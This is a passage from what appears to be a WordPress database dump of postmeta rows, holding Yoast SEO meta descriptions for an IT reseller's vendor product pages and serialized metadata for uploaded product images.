lifts.'),(2614,1483,'_yoast_wpseo_linkdex','79'),(2615,1477,'_yoast_wpseo_content_score','60'),(2616,1477,'_yoast_wpseo_focuskw','ESET'),(2617,1477,'_yoast_wpseo_metadesc','ESET is here to secure your computers and devices, protect your precious family pictures and data, or keep your company know-how safe.'),(2618,1477,'_yoast_wpseo_linkdex','86'),(2619,1529,'_yoast_wpseo_content_score','30'),(2620,1532,'_yoast_wpseo_content_score','30'),(2621,1532,'_yoast_wpseo_focuskw','Jabra'),(2622,1532,'_yoast_wpseo_metadesc','Our headphones and headsets are the perfect sound solutions for the office, the commute, the gym, or being out in the elements â€“ whatever you need, wherever you need it, we have world-class products to meet your demands.'),(2623,1532,'_yoast_wpseo_linkdex','81'),(2624,2003,'_yoast_wpseo_metadesc','Looking for a video conferencing solution for your business? Choose video conferencing solution that best fits your needs.'),(2625,1436,'_yoast_wpseo_focuskw','Adobe Acrobat DC'),(2626,1436,'_yoast_wpseo_metadesc','Adobe Acrobat DC is the most mobile, productive and collaborative PDF solution Adobe offers, combining Acrobat desktop software, mobile scan app, signature app and Acrobat Reader mobile app â€” enhanced with premium mobile features and premium Document Cloud services.'),(2627,1436,'_yoast_wpseo_linkdex','69'),(2628,1362,'_yoast_wpseo_focuskw','Supply Chain Services'),(2629,1362,'_yoast_wpseo_metadesc','At BINTARA, our comprehensive supply chain services ensure your IT estate is run efficiently and productively â€“ covering tailored procurement solutions through to complex international logistics.'),(2630,1362,'_yoast_wpseo_linkdex','56'),(2631,1362,'_yoast_wpseo_content_score','30'),(2632,1943,'_yoast_wpseo_metadesc','Broadbase is a provider of ICT networking equipment strategically focus on LAN connectivity environment.'),(2633,2232,'_wp_attached_file','2018/12/pdf-workflows.png'),(2634,2232,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:512;s:6:\"height\";i:331;s:4:\"file\";s:25:\"2018/12/pdf-workflows.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"pdf-workflows-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"pdf-workflows-300x194.png\";s:5:\"width\";i:300;s:6:\"height\";i:194;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:25:\"pdf-workflows-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:25:\"pdf-workflows-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:23:\"pdf-workflows-20x13.png\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2635,2233,'_wp_attached_file','2018/12/convert-files.png'),(2636,2233,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:422;s:6:\"height\";i:309;s:4:\"file\";s:25:\"2018/12/convert-files.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"convert-files-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"convert-files-300x220.png\";s:5:\"width\";i:300;s:6:\"height\";i:220;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:25:\"convert-files-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:25:\"convert-files-422x300.png\";s:5:\"width\";i:422;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:23:\"convert-files-20x15.png\";s:5:\"width\";i:20;s:6:\"height\";i:15;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2637,2234,'_wp_attached_file','2018/12/connect-documents.png'),(2638,2234,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:422;s:6:\"height\";i:230;s:4:\"file\";s:29:\"2018/12/connect-documents.png\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"connect-documents-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"connect-documents-300x164.png\";s:5:\"width\";i:300;s:6:\"height\";i:164;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:29:\"connect-documents-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:27:\"connect-documents-20x11.png\";s:5:\"width\";i:20;s:6:\"height\";i:11;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2639,2235,'_wp_attached_file','2018/12/maximize-time.png'),(2640,2235,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:422;s:6:\"height\";i:500;s:4:\"file\";s:25:\"2018/12/maximize-time.png\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"maximize-time-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"maximize-time-253x300.png\";s:5:\"width\";i:253;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:25:\"maximize-time-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:25:\"maximize-time-422x300.png\";s:5:\"width\";i:422;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:25:\"maximize-time-422x400.png\";s:5:\"width\";i:422;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:23:\"maximize-time-17x20.png\";s:5:\"width\";i:17;s:6:\"height\";i:20;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2641,1553,'_yoast_wpseo_focuskw','nitro'),(2642,1553,'_yoast_wpseo_metadesc','WORK FROM ANYWHERE WITH NITRO CLOUDWhether you need to merge PDFs online or access your files on the go, Nitro Cloud equips you with the tools to accomplish your goals anytime, anywhere.'),(2643,1553,'_yoast_wpseo_linkdex','86'),(2644,1553,'_yoast_wpseo_content_score','60'),(2645,1444,'_yoast_wpseo_metadesc','Autodesk, Inc., is a leader in 3D design, engineering and entertainment software. Since its introduction of AutoCAD software in 1982, Autodesk continues to develop the broadest portfolio of Build & Design software for global markets.'),(2650,1551,'_yoast_wpseo_metadesc','As a Microsoft Certified Partner, we have been recognized for our expertise and contribution to developing Microsoft based solutions.'),(2651,1552,'_yoast_wpseo_focuskw','NetApp'),(2652,1552,'_yoast_wpseo_metadesc','INTEGRATE CLOUD DATA SERVICESACCELERATE YOUR CLOUD WORKLOADS AND SIMPLIFY YOUR DATA PROTECTION.'),(2653,1552,'_yoast_wpseo_linkdex','67'),(2654,1552,'_yoast_wpseo_content_score','60'),(2655,1549,'_yoast_wpseo_content_score','30'),(2656,1549,'_yoast_wpseo_focuskw','McAfee ENDPOINT PROTECTION'),(2657,1549,'_yoast_wpseo_linkdex','74'),(2658,1549,'_yoast_wpseo_metadesc','MCAFEE ENDPOINT PROTECTIONOur new line of endpoint protection products swiftly detect, prevent, and correct advanced threats.'),(2659,1548,'_yoast_wpseo_focuskw','MapInfo Malaysia'),(2660,1548,'_yoast_wpseo_linkdex','49'),(2661,1548,'_yoast_wpseo_content_score','60'),(2662,2252,'_wp_attached_file','2018/12/hero.png'),(2663,2252,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1622;s:6:\"height\";i:1072;s:4:\"file\";s:16:\"2018/12/hero.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"hero-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"hero-300x198.png\";s:5:\"width\";i:300;s:6:\"height\";i:198;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:16:\"hero-768x508.png\";s:5:\"width\";i:768;s:6:\"height\";i:508;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:17:\"hero-1024x677.png\";s:5:\"width\";i:1024;s:6:\"height\";i:677;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:16:\"hero-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:16:\"hero-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:16:\"hero-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:14:\"hero-20x13.png\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2664,2253,'_wp_attached_file','2018/12/lenovo-laptop-think-t-series-hero2.png'),(2665,2253,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1622;s:6:\"height\";i:1072;s:4:\"file\";s:46:\"2018/12/lenovo-laptop-think-t-series-hero2.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:46:\"lenovo-laptop-think-t-series-hero2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:46:\"lenovo-laptop-think-t-series-hero2-300x198.png\";s:5:\"width\";i:300;s:6:\"height\";i:198;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:46:\"lenovo-laptop-think-t-series-hero2-768x508.png\";s:5:\"width\";i:768;s:6:\"height\";i:508;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:47:\"lenovo-laptop-think-t-series-hero2-1024x677.png\";s:5:\"width\";i:1024;s:6:\"height\";i:677;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:46:\"lenovo-laptop-think-t-series-hero2-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:46:\"lenovo-laptop-think-t-series-hero2-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:46:\"lenovo-laptop-think-t-series-hero2-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:44:\"lenovo-laptop-think-t-series-hero2-20x13.png\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2666,2254,'_wp_attached_file','2018/12/lenovo-thinkpad-p-series-feature-hero.png'),(2667,2254,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:830;s:6:\"height\";i:625;s:4:\"file\";s:49:\"2018/12/lenovo-thinkpad-p-series-feature-hero.png\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:49:\"lenovo-thinkpad-p-series-feature-hero-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:49:\"lenovo-thinkpad-p-series-feature-hero-300x226.png\";s:5:\"width\";i:300;s:6:\"height\";i:226;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:49:\"lenovo-thinkpad-p-series-feature-hero-768x578.png\";s:5:\"width\";i:768;s:6:\"height\";i:578;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:49:\"lenovo-thinkpad-p-series-feature-hero-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:49:\"lenovo-thinkpad-p-series-feature-hero-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:49:\"lenovo-thinkpad-p-series-feature-hero-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:47:\"lenovo-thinkpad-p-series-feature-hero-20x15.png\";s:5:\"width\";i:20;s:6:\"height\";i:15;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2668,1545,'_yoast_wpseo_content_score','60'),(2669,1545,'_yoast_wpseo_focuskw','Lenovo'),(2670,1545,'_yoast_wpseo_linkdex','75'),(2671,1545,'_yoast_wpseo_metadesc','There\'s a reason ThinkPad reliability is legendary and it starts with military-spec testing against extremes â€” our laptops more than endure the rigors of everyday life. Factor in the award-winning precision keyboard with its renowned red TrackPointÂ®, multitouch touchpad, ergonomic keys, and convenient multimedia buttons and we\'ve got comfort covered too.'),(2672,1474,'_yoast_wpseo_content_score','30'),(2673,2260,'_wp_attached_file','2018/12/large_zoom01.jpg'),(2674,2260,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1600;s:6:\"height\";i:940;s:4:\"file\";s:24:\"2018/12/large_zoom01.jpg\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"large_zoom01-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"large_zoom01-300x176.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:176;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"large_zoom01-768x451.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:451;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"large_zoom01-1024x602.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:602;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:24:\"large_zoom01-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:24:\"large_zoom01-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:24:\"large_zoom01-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:22:\"large_zoom01-20x12.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:12;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2675,2261,'_wp_attached_file','2018/12/large_zoom01-1.jpg'),(2676,2261,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1600;s:6:\"height\";i:940;s:4:\"file\";s:26:\"2018/12/large_zoom01-1.jpg\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"large_zoom01-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"large_zoom01-1-300x176.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:176;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"large_zoom01-1-768x451.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:451;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:27:\"large_zoom01-1-1024x602.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:602;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:26:\"large_zoom01-1-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:26:\"large_zoom01-1-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:26:\"large_zoom01-1-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:24:\"large_zoom01-1-20x12.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:12;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2677,2262,'_wp_attached_file','2018/12/34UC98-W_940_01.jpg'),(2678,2262,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:940;s:6:\"height\";i:620;s:4:\"file\";s:27:\"2018/12/34UC98-W_940_01.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"34UC98-W_940_01-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"34UC98-W_940_01-300x198.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"34UC98-W_940_01-768x507.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:507;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:27:\"34UC98-W_940_01-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:27:\"34UC98-W_940_01-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:27:\"34UC98-W_940_01-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:25:\"34UC98-W_940_01-20x13.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2679,2263,'_wp_attached_file','2018/12/29UM69G-B_20180118_D01.jpg'),(2680,2263,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:940;s:6:\"height\";i:620;s:4:\"file\";s:34:\"2018/12/29UM69G-B_20180118_D01.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:34:\"29UM69G-B_20180118_D01-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:34:\"29UM69G-B_20180118_D01-300x198.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:34:\"29UM69G-B_20180118_D01-768x507.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:507;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:34:\"29UM69G-B_20180118_D01-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:34:\"29UM69G-B_20180118_D01-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:34:\"29UM69G-B_20180118_D01-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:32:\"29UM69G-B_20180118_D01-20x13.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:42:\"Leaf Aptus-II 10(LI301762   )/Large Format\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1480332471\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:2:\"80\";s:13:\"shutter_speed\";s:4:\"0.05\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(2681,2264,'_wp_attached_file','2018/12/29UM59A-P_D1_110817.jpg'),(2682,2264,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:940;s:6:\"height\";i:620;s:4:\"file\";s:31:\"2018/12/29UM59A-P_D1_110817.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"29UM59A-P_D1_110817-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"29UM59A-P_D1_110817-300x198.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"29UM59A-P_D1_110817-768x507.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:507;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:31:\"29UM59A-P_D1_110817-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:31:\"29UM59A-P_D1_110817-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:31:\"29UM59A-P_D1_110817-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:29:\"29UM59A-P_D1_110817-20x13.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2683,1546,'_yoast_wpseo_content_score','90'),(2684,2265,'_wp_attached_file','2018/12/medium01.jpg'),(2685,2265,'_wp_attachment_metadata','a:5:{